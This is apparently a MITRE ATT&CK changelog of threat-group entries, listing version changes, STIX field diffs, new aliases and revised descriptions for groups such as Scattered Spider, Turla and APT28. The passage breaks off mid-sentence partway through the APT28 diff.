external_references | | {'source_name': 'Leonard TAG 2023', 'description': 'Billy Leonard. (2023, April 19). Ukraine remains Russia’s biggest cyber focus in 2023. Retrieved March 1, 2024.', 'url': 'https://blog.google/threat-analysis-group/ukraine-remains-russias-biggest-cyber-focus-in-2023/'}
external_references | | {'source_name': 'Microsoft Threat Actor Naming July 2023', 'description': 'Microsoft . (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.', 'url': 'https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide'}

[G1015] Scattered Spider

Current version: 2.0

Version changed from: 1.0 → 2.0


Old Description
[Scattered Spider](https://attack.mitre.org/groups/G1015) is a cybercriminal group that has been active since at least 2022 targeting customer relationship management and business-process outsourcing (BPO) firms as well as telecommunications and technology companies. During campaigns [Scattered Spider](https://attack.mitre.org/groups/G1015) has leveraged targeted social-engineering techniques and attempted to bypass popular endpoint security tools.(Citation: CrowdStrike Scattered Spider Profile)(Citation: CrowdStrike Scattered Spider BYOVD January 2023)(Citation: Crowdstrike TELCO BPO Campaign December 2022)

New Description
[Scattered Spider](https://attack.mitre.org/groups/G1015) is a native English-speaking cybercriminal group that has been active since at least 2022.(Citation: CrowdStrike Scattered Spider Profile)(Citation: MSTIC Octo Tempest Operations October 2023) The group initially targeted customer relationship management and business-process outsourcing (BPO) firms as well as telecommunications and technology companies. Beginning in 2023, [Scattered Spider](https://attack.mitre.org/groups/G1015) expanded its operations to compromise victims in the gaming, hospitality, retail, MSP, manufacturing, and financial sectors.(Citation: MSTIC Octo Tempest Operations October 2023) During campaigns, [Scattered Spider](https://attack.mitre.org/groups/G1015) has leveraged targeted social-engineering techniques, attempted to bypass popular endpoint security tools, and more recently, deployed ransomware for financial gain.(Citation: CISA Scattered Spider Advisory November 2023)(Citation: CrowdStrike Scattered Spider BYOVD January 2023)(Citation: CrowdStrike Scattered Spider Profile)(Citation: MSTIC Octo Tempest Operations October 2023)(Citation: Crowdstrike TELCO BPO Campaign December 2022)

Details
values_changed
STIX Field | Old value | New Value
modified | 2023-09-22 18:36:55.117000+00:00 | 2024-04-04 21:24:48.602000+00:00
description | [Scattered Spider](https://attack.mitre.org/groups/G1015) is a cybercriminal group that has been active since at least 2022 targeting customer relationship management and business-process outsourcing (BPO) firms as well as telecommunications and technology companies. During campaigns [Scattered Spider](https://attack.mitre.org/groups/G1015) has leveraged targeted social-engineering techniques and attempted to bypass popular endpoint security tools.(Citation: CrowdStrike Scattered Spider Profile)(Citation: CrowdStrike Scattered Spider BYOVD January 2023)(Citation: Crowdstrike TELCO BPO Campaign December 2022) | [Scattered Spider](https://attack.mitre.org/groups/G1015) is a native English-speaking cybercriminal group that has been active since at least 2022.(Citation: CrowdStrike Scattered Spider Profile)(Citation: MSTIC Octo Tempest Operations October 2023) The group initially targeted customer relationship management and business-process outsourcing (BPO) firms as well as telecommunications and technology companies. Beginning in 2023, [Scattered Spider](https://attack.mitre.org/groups/G1015) expanded its operations to compromise victims in the gaming, hospitality, retail, MSP, manufacturing, and financial sectors.(Citation: MSTIC Octo Tempest Operations October 2023) During campaigns, [Scattered Spider](https://attack.mitre.org/groups/G1015) has leveraged targeted social-engineering techniques, attempted to bypass popular endpoint security tools, and more recently, deployed ransomware for financial gain.(Citation: CISA Scattered Spider Advisory November 2023)(Citation: CrowdStrike Scattered Spider BYOVD January 2023)(Citation: CrowdStrike Scattered Spider Profile)(Citation: MSTIC Octo Tempest Operations October 2023)(Citation: Crowdstrike TELCO BPO Campaign December 2022)
x_mitre_attack_spec_version | 3.1.0 | 3.2.0
x_mitre_version | 1.0 | 2.0
iterable_item_added
STIX Field | Old value | New Value
aliases | | Octo Tempest
aliases | | Storm-0875
external_references | | {'source_name': 'Octo Tempest', 'description': '(Citation: Microsoft Threat Actor Naming July 2023)'}
external_references | | {'source_name': 'Storm-0875', 'description': '(Citation: Microsoft Threat Actor Naming July 2023)'}
external_references | | {'source_name': 'CISA Scattered Spider Advisory November 2023', 'description': 'CISA. (2023, November 16). Cybersecurity Advisory: Scattered Spider (AA23-320A). Retrieved March 18, 2024.', 'url': 'https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-320a'}
external_references | | {'source_name': 'Microsoft Threat Actor Naming July 2023', 'description': 'Microsoft . (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.', 'url': 'https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide'}
external_references | | {'source_name': 'MSTIC Octo Tempest Operations October 2023', 'description': 'Microsoft. (2023, October 25). Octo Tempest crosses boundaries to facilitate extortion, encryption, and destruction. Retrieved March 18, 2024.', 'url': 'https://www.microsoft.com/en-us/security/blog/2023/10/25/octo-tempest-crosses-boundaries-to-facilitate-extortion-encryption-and-destruction/'}
x_mitre_domains | | mobile-attack

[G0092] TA505

Current version: 3.0

Version changed from: 2.1 → 3.0

Details
values_changed
STIX Field | Old value | New value
modified | 2023-03-22 05:38:20.381000+00:00 | 2024-04-10 22:37:02.592000+00:00
x_mitre_attack_spec_version | 3.1.0 | 3.2.0
x_mitre_version | 2.1 | 3.0
iterable_item_added
STIX Field | Old value | New value
aliases | | Spandex Tempest
aliases | | CHIMBORAZO
external_references | | {'source_name': 'Spandex Tempest', 'description': '(Citation: Microsoft Threat Actor Naming July 2023)'}
external_references | | {'source_name': 'CHIMBORAZO', 'description': '(Citation: Microsoft Threat Actor Naming July 2023)'}
external_references | | {'source_name': 'Microsoft Threat Actor Naming July 2023', 'description': 'Microsoft . (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.', 'url': 'https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide'}

[G0010] Turla

Current version: 5.0

Version changed from: 4.0 → 5.0

Details
values_changed
STIX Field | Old value | New value
modified | 2023-08-02 19:48:08.774000+00:00 | 2024-04-17 22:12:21.483000+00:00
external_references[1]['source_name'] | Belugasturgeon | BELUGASTURGEON
x_mitre_attack_spec_version | 3.1.0 | 3.2.0
x_mitre_version | 4.0 | 5.0
iterable_item_added
STIX Field | Old value | New value
aliases | | Secret Blizzard
aliases | | BELUGASTURGEON
external_references | | {'source_name': 'Secret Blizzard', 'description': '(Citation: Microsoft Threat Actor Naming July 2023)'}
external_references | | {'source_name': 'Microsoft Threat Actor Naming July 2023', 'description': 'Microsoft . (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.', 'url': 'https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide'}
iterable_item_removed
STIX Field | Old value | New value
aliases | Belugasturgeon |

[G0102] Wizard Spider

Current version: 4.0

Version changed from: 3.0 → 4.0

Details
values_changed
STIX Field | Old value | New value
modified | 2023-09-12 14:35:52.920000+00:00 | 2024-04-03 20:21:34.872000+00:00
external_references[7]['description'] | (Citation: Secureworks Gold Blackburn Mar 2022) | (Citation: Microsoft Threat Actor Naming July 2023)
x_mitre_attack_spec_version | 3.1.0 | 3.2.0
x_mitre_version | 3.0 | 4.0
iterable_item_added
STIX Field | Old value | New value
aliases | | DEV-0193
external_references | | {'source_name': 'DEV-0193', 'description': '(Citation: Microsoft Threat Actor Naming July 2023)'}
external_references | | {'source_name': 'Microsoft Threat Actor Naming July 2023', 'description': 'Microsoft . (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.', 'url': 'https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide'}

[G0128] ZIRCONIUM

Current version: 2.0

Version changed from: 1.1 → 2.0

Details
values_changed
STIX Field | Old value | New value
modified | 2023-03-22 22:10:43.732000+00:00 | 2024-01-08 22:16:18.643000+00:00
x_mitre_attack_spec_version | 3.1.0 | 3.2.0
x_mitre_version | 1.1 | 2.0
iterable_item_added
STIX Field | Old value | New value
aliases | | Violet Typhoon
external_references | | {'source_name': 'Violet Typhoon', 'description': '(Citation: Microsoft Threat Actor Naming July 2023)'}
external_references | | {'source_name': 'Microsoft Threat Actor Naming July 2023', 'description': 'Microsoft . (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.', 'url': 'https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide'}

[G0045] menuPass

Current version: 3.0

Version changed from: 2.1 → 3.0

Details
values_changed
STIX Field | Old value | New value
modified | 2023-03-23 15:06:31.019000+00:00 | 2024-04-11 00:47:44.925000+00:00
x_mitre_attack_spec_version | 3.1.0 | 3.2.0
x_mitre_version | 2.1 | 3.0
iterable_item_added
STIX Field | Old value | New value
aliases | | BRONZE RIVERSIDE
external_references | | {'source_name': 'BRONZE RIVERSIDE', 'description': '(Citation: SecureWorks BRONZE STARLIGHT Ransomware Operations June 2022)'}
external_references | | {'source_name': 'SecureWorks BRONZE STARLIGHT Ransomware Operations June 2022', 'description': 'Counter Threat Unit Research Team . (2022, June 23). BRONZE STARLIGHT RANSOMWARE OPERATIONS USE HUI LOADER. Retrieved December 7, 2023.', 'url': 'https://www.secureworks.com/research/bronze-starlight-ransomware-operations-use-hui-loader'}

Minor Version Changes

[G0026] APT18

Current version: 2.2

Version changed from: 2.1 → 2.2

Details
dictionary_item_added
STIX Field | Old value | New value
x_mitre_attack_spec_version | | 3.2.0
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New value
modified | 2020-03-30 18:46:16.853000+00:00 | 2024-04-11 03:03:44.056000+00:00
x_mitre_version | 2.1 | 2.2

[G0073] APT19

Current version: 1.6

Version changed from: 1.5 → 1.6

Details
values_changed
STIX Field | Old value | New value
modified | 2023-03-21 20:44:02.443000+00:00 | 2024-04-11 03:03:02.576000+00:00
x_mitre_attack_spec_version | 3.1.0 | 3.2.0
x_mitre_version | 1.5 | 1.6

[G0087] APT39

Current version: 3.2

Version changed from: 3.1 → 3.2

Details
values_changed
STIX Field | Old value | New value
modified | 2022-09-02 18:03:29.024000+00:00 | 2024-04-11 02:59:52.392000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.2.0
x_mitre_version | 3.1 | 3.2

[G1002] BITTER

Current version: 1.1

Version changed from: 1.0 → 1.1


Old Description
[BITTER](https://attack.mitre.org/groups/G1002) is a suspected South Asian cyber espionage threat group that has been active since at least 2013. [BITTER](https://attack.mitre.org/groups/G1002) has primarily targeted government, energy, and engineering organizations in Pakistan, China, Bangladesh, and Saudi Arabia.(Citation: Cisco Talos Bitter Bangladesh May 2022)(Citation: Forcepoint BITTER Pakistan Oct 2016)

New Description
[BITTER](https://attack.mitre.org/groups/G1002) is a suspected South Asian cyber espionage threat group that has been active since at least 2013. [BITTER](https://attack.mitre.org/groups/G1002) has targeted government, energy, and engineering organizations in Pakistan, China, Bangladesh, and Saudi Arabia.(Citation: Cisco Talos Bitter Bangladesh May 2022)(Citation: Forcepoint BITTER Pakistan Oct 2016)

Details
values_changed
STIX Field | Old value | New value
modified | 2022-06-01 21:20:18.113000+00:00 | 2024-04-11 02:52:27.131000+00:00
description | [BITTER](https://attack.mitre.org/groups/G1002) is a suspected South Asian cyber espionage threat group that has been active since at least 2013. [BITTER](https://attack.mitre.org/groups/G1002) has primarily targeted government, energy, and engineering organizations in Pakistan, China, Bangladesh, and Saudi Arabia.(Citation: Cisco Talos Bitter Bangladesh May 2022)(Citation: Forcepoint BITTER Pakistan Oct 2016) | [BITTER](https://attack.mitre.org/groups/G1002) is a suspected South Asian cyber espionage threat group that has been active since at least 2013. [BITTER](https://attack.mitre.org/groups/G1002) has targeted government, energy, and engineering organizations in Pakistan, China, Bangladesh, and Saudi Arabia.(Citation: Cisco Talos Bitter Bangladesh May 2022)(Citation: Forcepoint BITTER Pakistan Oct 2016)
x_mitre_attack_spec_version | 2.1.0 | 3.2.0
x_mitre_version | 1.0 | 1.1
iterable_item_added
STIX Field | Old value | New value
x_mitre_domains | | mobile-attack

[G0108] Blue Mockingbird

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
dictionary_item_added
STIX Field | Old value | New value
x_mitre_attack_spec_version | | 3.2.0
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New value
modified | 2021-10-12 21:46:13.007000+00:00 | 2024-04-11 02:50:01.851000+00:00
x_mitre_version | 1.1 | 1.2

[G0070] Dark Caracal

Current version: 1.4

Version changed from: 1.3 → 1.4

Details
dictionary_item_added
STIX Field | Old value | New value
x_mitre_attack_spec_version | | 3.2.0
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New value
modified | 2021-10-11 19:08:18.503000+00:00 | 2024-04-11 02:42:07.325000+00:00
x_mitre_version | 1.3 | 1.4

[G0066] Elderwood

Current version: 1.3

Version changed from: 1.2 → 1.3

Details
dictionary_item_added
STIX Field | Old value | New value
x_mitre_attack_spec_version | | 3.2.0
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New value
modified | 2021-03-02 22:40:11.097000+00:00 | 2024-04-11 02:36:24.044000+00:00
x_mitre_version | 1.2 | 1.3

[G0043] Group5

Current version: 1.3

Version changed from: 1.2 → 1.3

Details
dictionary_item_added
STIX Field | Old value | New value
x_mitre_attack_spec_version | | 3.2.0
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New value
modified | 2020-03-30 19:07:39.812000+00:00 | 2024-04-11 02:23:59.598000+00:00
x_mitre_version | 1.2 | 1.3

[G1001] HEXANE

Current version: 2.2

Version changed from: 2.1 → 2.2

Details
values_changed
STIX Field | Old value | New value
modified | 2023-03-22 04:43:59.082000+00:00 | 2024-02-09 19:27:00.371000+00:00
x_mitre_attack_spec_version | 3.1.0 | 3.2.0
x_mitre_version | 2.1 | 2.2

[G0126] Higaisa

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
dictionary_item_added
STIX Field | Old value | New value
x_mitre_attack_spec_version | | 3.2.0
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New value
modified | 2021-04-22 02:12:43.892000+00:00 | 2024-04-11 02:19:20.934000+00:00
x_mitre_version | 1.0 | 1.1

[G0100] Inception

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
dictionary_item_added
STIX Field | Old value | New value
x_mitre_attack_spec_version | | 3.2.0
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New value
modified | 2021-10-12 23:21:06.480000+00:00 | 2024-04-11 02:15:23.096000+00:00
x_mitre_version | 1.1 | 1.2

[G1013] Metador

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
values_changed
STIX Field | Old value | New value
modified | 2023-04-14 12:25:35.434000+00:00 | 2024-04-11 00:46:59.526000+00:00
x_mitre_attack_spec_version | 3.1.0 | 3.2.0
x_mitre_version | 1.0 | 1.1

[G0103] Mofang

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
dictionary_item_added
STIX Field | Old value | New value
x_mitre_attack_spec_version | | 3.2.0
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New value
modified | 2020-05-29 03:30:39.739000+00:00 | 2024-04-11 00:41:37.453000+00:00
x_mitre_version | 1.0 | 1.1

[G0021] Molerats

Current version: 2.1

Version changed from: 2.0 → 2.1

Details
dictionary_item_added
STIX Field | Old value | New value
x_mitre_attack_spec_version | | 3.2.0
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New value
modified | 2021-04-27 20:16:16.057000+00:00 | 2024-04-11 00:40:46.966000+00:00
x_mitre_version | 2.0 | 2.1

[G0056] PROMETHIUM

Current version: 2.1

Version changed from: 2.0 → 2.1

Details
dictionary_item_added
STIX Field | Old value | New value
x_mitre_attack_spec_version | | 3.2.0
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New value
modified | 2020-10-22 18:12:48.893000+00:00 | 2024-04-19 19:35:15.637000+00:00
x_mitre_version | 2.0 | 2.1

[G0024] Putter Panda

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
dictionary_item_added
STIX Field | Old value | New value
x_mitre_attack_spec_version | | 3.2.0
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New value
modified | 2020-03-30 19:15:04.771000+00:00 | 2024-04-11 00:24:27.983000+00:00
x_mitre_version | 1.1 | 1.2

[G0075] Rancor

Current version: 1.3

Version changed from: 1.2 → 1.3

Details
dictionary_item_added
STIX Field | Old value | New value
x_mitre_attack_spec_version | | 3.2.0
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New value
modified | 2020-03-30 19:15:49.217000+00:00 | 2024-02-09 19:30:38.407000+00:00
x_mitre_version | 1.2 | 1.3

[G0121] Sidewinder

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
values_changed
STIX Field | Old value | New value
modified | 2023-03-22 05:31:54.382000+00:00 | 2024-04-11 00:07:05.918000+00:00
x_mitre_attack_spec_version | 3.1.0 | 3.2.0
x_mitre_version | 1.1 | 1.2

[G1018] TA2541

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
values_changed
STIX Field | Old value | New value
modified | 2023-10-10 17:19:36.480000+00:00 | 2024-04-10 22:38:45.199000+00:00
x_mitre_version | 1.0 | 1.1

[G0088] TEMP.Veles

Current version: 1.4

Version changed from: 1.3 → 1.4

Details
values_changed
STIX Field | Old value | New value
modified | 2022-11-30 22:46:40.135000+00:00 | 2024-04-17 16:13:43.697000+00:00
x_mitre_attack_spec_version | 3.1.0 | 3.2.0
x_mitre_version | 1.3 | 1.4
x_mitre_contributors[0] | Dragos Threat Intelligence | Dragos Threat Intelligence

[G0139] TeamTNT

Current version: 1.3

Version changed from: 1.2 → 1.3

Details
values_changed
STIX Field | Old value | New value
modified | 2022-10-19 21:35:03.147000+00:00 | 2024-04-10 22:34:04.070000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.2.0
x_mitre_version | 1.2 | 1.3

[G0027] Threat Group-3390

Current version: 2.2

Version changed from: 2.1 → 2.2

Details
values_changed
STIX Field | Old value | New value
modified | 2023-03-29 16:53:17.235000+00:00 | 2024-04-10 22:33:06.500000+00:00
x_mitre_attack_spec_version | 3.1.0 | 3.2.0
x_mitre_version | 2.1 | 2.2

[G0134] Transparent Tribe

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
values_changed
STIX Field | Old value | New value
modified | 2022-09-22 20:27:21.053000+00:00 | 2024-04-10 22:30:51.062000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.2.0
x_mitre_version | 1.1 | 1.2

[G0081] Tropic Trooper

Current version: 1.5

Version changed from: 1.4 → 1.5

Details
dictionary_item_added
STIX Field | Old value | New value
x_mitre_attack_spec_version | | 3.2.0
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New value
modified | 2021-04-26 14:15:15.610000+00:00 | 2024-04-18 18:24:29.185000+00:00
x_mitre_version | 1.4 | 1.5
iterable_item_removed
STIX Field | Old value | New value
x_mitre_contributors | Bart Parys |

[G1017] Volt Typhoon

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
values_changed
STIX Field | Old value | New value
modified | 2023-10-03 15:45:14.731000+00:00 | 2024-03-28 04:14:40.834000+00:00
x_mitre_version | 1.0 | 1.1

[G0107] Whitefly

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
dictionary_item_added
STIX Field | Old value | New value
x_mitre_attack_spec_version | | 3.2.0
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New value
modified | 2021-10-12 21:43:24.133000+00:00 | 2024-04-10 20:43:09.698000+00:00
x_mitre_version | 1.1 | 1.2

Patches

[G0022] APT3

Current version: 1.4


Old Description
[APT3](https://attack.mitre.org/groups/G0022) is a China-based threat group that researchers have attributed to China's Ministry of State Security.(Citation: FireEye Clandestine Wolf)(Citation: Recorded Future APT3 May 2017) This group is responsible for the campaigns known as Operation Clandestine Fox, Operation Clandestine Wolf, and Operation Double Tap.(Citation: FireEye Clandestine Wolf)(Citation: FireEye Operation Double Tap) As of June 2015, the group appears to have shifted from targeting primarily US victims to primarily political organizations in Hong Kong.(Citation: Symantec Buckeye) In 2017, MITRE developed an APT3 Adversary Emulation Plan.(Citation: APT3 Adversary Emulation Plan)

New Description
[APT3](https://attack.mitre.org/groups/G0022) is a China-based threat group that researchers have attributed to China's Ministry of State Security.(Citation: FireEye Clandestine Wolf)(Citation: Recorded Future APT3 May 2017) This group is responsible for the campaigns known as Operation Clandestine Fox, Operation Clandestine Wolf, and Operation Double Tap.(Citation: FireEye Clandestine Wolf)(Citation: FireEye Operation Double Tap) As of June 2015, the group appears to have shifted from targeting primarily US victims to primarily political organizations in Hong Kong.(Citation: Symantec Buckeye)

Details
dictionary_item_added
STIX Field | Old value | New value
x_mitre_attack_spec_version | | 3.2.0
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New value
modified | 2021-10-01 19:09:20.817000+00:00 | 2024-02-06 17:49:35.261000+00:00
description | [APT3](https://attack.mitre.org/groups/G0022) is a China-based threat group that researchers have attributed to China's Ministry of State Security.(Citation: FireEye Clandestine Wolf)(Citation: Recorded Future APT3 May 2017) This group is responsible for the campaigns known as Operation Clandestine Fox, Operation Clandestine Wolf, and Operation Double Tap.(Citation: FireEye Clandestine Wolf)(Citation: FireEye Operation Double Tap) As of June 2015, the group appears to have shifted from targeting primarily US victims to primarily political organizations in Hong Kong.(Citation: Symantec Buckeye) In 2017, MITRE developed an APT3 Adversary Emulation Plan.(Citation: APT3 Adversary Emulation Plan) | [APT3](https://attack.mitre.org/groups/G0022) is a China-based threat group that researchers have attributed to China's Ministry of State Security.(Citation: FireEye Clandestine Wolf)(Citation: Recorded Future APT3 May 2017) This group is responsible for the campaigns known as Operation Clandestine Fox, Operation Clandestine Wolf, and Operation Double Tap.(Citation: FireEye Clandestine Wolf)(Citation: FireEye Operation Double Tap) As of June 2015, the group appears to have shifted from targeting primarily US victims to primarily political organizations in Hong Kong.(Citation: Symantec Buckeye)
iterable_item_removed
STIX Field | Old value | New value
external_references | {'source_name': 'APT3 Adversary Emulation Plan', 'description': 'Korban, C, et al. (2017, September). APT3 Adversary Emulation Plan. Retrieved January 16, 2018.', 'url': 'https://attack.mitre.org/docs/APT3_Adversary_Emulation_Plan.pdf'} |

mobile-attack

New Groups

[G1028] APT-C-23

Current version: 1.0

Description: [APT-C-23](https://attack.mitre.org/groups/G1028) is a threat group that has been active since at least 2014.(Citation: symantec_mantis) [APT-C-23](https://attack.mitre.org/groups/G1028) has primarily focused its operations on the Middle East, including Israeli military assets. [APT-C-23](https://attack.mitre.org/groups/G1028) has developed mobile spyware targeting Android and iOS devices since 2017.(Citation: welivesecurity_apt-c-23)


[G1002] BITTER

Current version: 1.1

Description: [BITTER](https://attack.mitre.org/groups/G1002) is a suspected South Asian cyber espionage threat group that has been active since at least 2013. [BITTER](https://attack.mitre.org/groups/G1002) has targeted government, energy, and engineering organizations in Pakistan, China, Bangladesh, and Saudi Arabia.(Citation: Cisco Talos Bitter Bangladesh May 2022)(Citation: Forcepoint BITTER Pakistan Oct 2016)


[G0056] PROMETHIUM

Current version: 2.1

Description: [PROMETHIUM](https://attack.mitre.org/groups/G0056) is an activity group focused on espionage that has been active since at least 2012. The group has conducted operations globally with a heavy emphasis on Turkish targets. [PROMETHIUM](https://attack.mitre.org/groups/G0056) has demonstrated similarity to another activity group called [NEODYMIUM](https://attack.mitre.org/groups/G0055) due to overlapping victim and campaign characteristics.(Citation: Microsoft NEODYMIUM Dec 2016)(Citation: Microsoft SIR Vol 21)(Citation: Talos Promethium June 2020)


[G1015] Scattered Spider

Current version: 2.0

Description: [Scattered Spider](https://attack.mitre.org/groups/G1015) is a native English-speaking cybercriminal group that has been active since at least 2022.(Citation: CrowdStrike Scattered Spider Profile)(Citation: MSTIC Octo Tempest Operations October 2023) The group initially targeted customer relationship management and business-process outsourcing (BPO) firms as well as telecommunications and technology companies. Beginning in 2023, [Scattered Spider](https://attack.mitre.org/groups/G1015) expanded its operations to compromise victims in the gaming, hospitality, retail, MSP, manufacturing, and financial sectors.(Citation: MSTIC Octo Tempest Operations October 2023) During campaigns, [Scattered Spider](https://attack.mitre.org/groups/G1015) has leveraged targeted social-engineering techniques, attempted to bypass popular endpoint security tools, and more recently, deployed ransomware for financial gain.(Citation: CISA Scattered Spider Advisory November 2023)(Citation: CrowdStrike Scattered Spider BYOVD January 2023)(Citation: CrowdStrike Scattered Spider Profile)(Citation: MSTIC Octo Tempest Operations October 2023)(Citation: Crowdstrike TELCO BPO Campaign December 2022)


[G1029] UNC788

Current version: 1.0

Description: [UNC788](https://attack.mitre.org/groups/G1029) is a group of hackers from Iran that has targeted people in the Middle East.(Citation: Meta Adversarial Threat Report 2022)

Major Version Changes

[G0007] APT28

Current version: 5.0

Version changed from: 4.0 → 5.0


Old Description
[APT28](https://attack.mitre.org/groups/G0007) is a threat group that has been attributed to Russia's General Staff Main Intelligence Directorate (GRU) 85th Main Special Service Center (GTsSS) military unit 26165.(Citation: NSA/FBI Drovorub August 2020)(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021) This group has been active since at least 2004.(Citation: DOJ GRU Indictment Jul 2018)(Citation: Ars Technica GRU indictment Jul 2018)(Citation: Crowdstrike DNC June 2016)(Citation: FireEye APT28)(Citation: SecureWorks TG-4127)(Citation: FireEye APT28 January 2017)(Citation: GRIZZLY STEPPE JAR)(Citation: Sofacy DealersChoice)(Citation: Palo Alto Sofacy 06-2018)(Citation: Symantec APT28 Oct 2018)(Citation: ESET Zebrocy May 2019) [APT28](https://attack.mitre.org/groups/G0007) reportedly compromised the Hillary Clinton campaign, the Democratic National Committee, and the Democratic Congressional Campaign Committee in 2016 in an attempt to interfere with the U.S. presidential election. (Citation: Crowdstrike DNC June 2016) In 2018, the US indicted five GRU Unit 26165 officers associated with [APT28](https://attack.mitre.org/groups/G0007) for cyber operations (including close-access operations) conducted between 2014 and 2018 against the World Anti-Doping Agency (WADA), the US Anti-Doping Agency, a US nuclear facility, the Organization for the Prohibition of Chemical Weapons (OPCW), the Spiez Swiss Chemicals Laboratory, and other organizations.(Citation: US District Court Indictment GRU Oct 2018) Some of these were conducted with the assistance of GRU Unit 74455, which is also referred to as [Sandworm Team](https://attack.mitre.org/groups/G0034).

New Description
[APT28](https://attack.mitre.org/groups/G0007) is a threat group that has been attributed to Russia's General Staff Main Intelligence Directorate (GRU) 85th Main Special Service Center (GTsSS) military unit 26165.(Citation: NSA/FBI Drovorub August 2020)(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021) This group has been active since at least 2004.(Citation: DOJ GRU Indictment Jul 2018)(Citation: Ars Technica GRU indictment Jul 2018)(Citation: Crowdstrike DNC June 2016)(Citation: FireEye APT28)(Citation: SecureWorks TG-4127)(Citation: FireEye APT28 January 2017)(Citation: GRIZZLY STEPPE JAR)(Citation: Sofacy DealersChoice)(Citation: Palo Alto Sofacy 06-2018)(Citation: Symantec APT28 Oct 2018)(Citation: ESET Zebrocy May 2019) [APT28](https://attack.mitre.org/groups/G0007) reportedly compromised the Hillary Clinton campaign, the Democratic National Committee, and the Democratic Congressional Campaign Committee in 2016 in an attempt to interfere with the U.S. presidential election.(Citation: Crowdstrike DNC June 2016) In 2018, the US indicted five GRU Unit 26165 officers associated with [APT28](https://attack.mitre.org/groups/G0007) for cyber operations (including close-access operations) conducted between 2014 and 2018 against the World Anti-Doping Agency (WADA), the US Anti-Doping Agency, a US nuclear facility, the Organization for the Prohibition of Chemical Weapons (OPCW), the Spiez Swiss Chemicals Laboratory, and other organizations.(Citation: US District Court Indictment GRU Oct 2018) Some of these were conducted with the assistance of GRU Unit 74455, which is also referred to as [Sandworm Team](https://attack.mitre.org/groups/G0034).

Details
values_changed
STIX Field | Old value | New value
modified | 2023-03-26 17:51:20.401000+00:00 | 2024-04-04 19:07:48.903000+00:00
description | [APT28](https://attack.mitre.org/groups/G0007) is a threat group that has been attributed to Russia's General Staff Main Intelligence Directorate (GRU) 85th Main Special Service Center (GTsSS) military unit 26165.(Citation: NSA/FBI Drovorub August 2020)(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021) This group has been active since at least 2004.(Citation: DOJ GRU Indictment Jul 2018)(Citation: Ars Technica GRU indictment Jul 2018)(Citation: Crowdstrike DNC June 2016)(Citation: FireEye APT28)(Citation: SecureWorks TG-4127)(Citation: FireEye APT28 January 2017)(Citation: GRIZZLY STEPPE JAR)(Citation: Sofacy DealersChoice)(Citation: Palo Alto Sofacy 06-2018)(Citation: Symantec APT28 Oct 2018)(Citation: ESET Zebrocy May 2019) [APT28](https://attack.mitre.org/groups/G0007) reportedly compromised the Hillary Clinton campaign, the Democratic National Committee, and the Democratic Congressional Campaign Committee in 2016 in an attempt to interfere with the U.S. presidential election. (Citation: Crowdstrike DNC June 2016) In 2018, the US indicted five GRU Unit 26165 officers associated with [APT28](https://attack.mitre.org/groups/G0007) for cyber operations (including close-access operations) conducted between 2014 and 2018 against the World Anti-Doping Agency (WADA), the US Anti-Doping Agency, a US nuclear facility, the Organization for the Prohibition of Chemical Weapons (OPCW), the Spiez Swiss Chemicals Laboratory, and other organizations.(Citation: US District Court Indictment GRU Oct 2018) Some of these were conducted with the assistance of GRU Unit 74455, which is also referred to as [Sandworm Team](https://attack.mitre.org/groups/G0034). | [APT28](https://attack.mitre.org/groups/G0007) is a threat group that has been attributed to Russia's General Staff Main Intelligence Directorate (GRU) 85th Main Special Service Center (GTsSS) military unit 26165.(Citation: NSA/FBI Drovorub August 2020)(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021) This group has been active since at least 2004.(Citation: DOJ GRU Indictment Jul 2018)(Citation: Ars Technica GRU indictment Jul 2018)(Citation: Crowdstrike DNC June 2016)(Citation: FireEye APT28)(Citation: SecureWorks TG-4127)(Citation: FireEye APT28 January 2017)(Citation: GRIZZLY STEPPE JAR)(Citation: Sofacy DealersChoice)(Citation: Palo Alto Sofacy 06-2018)(Citation: Symantec APT28 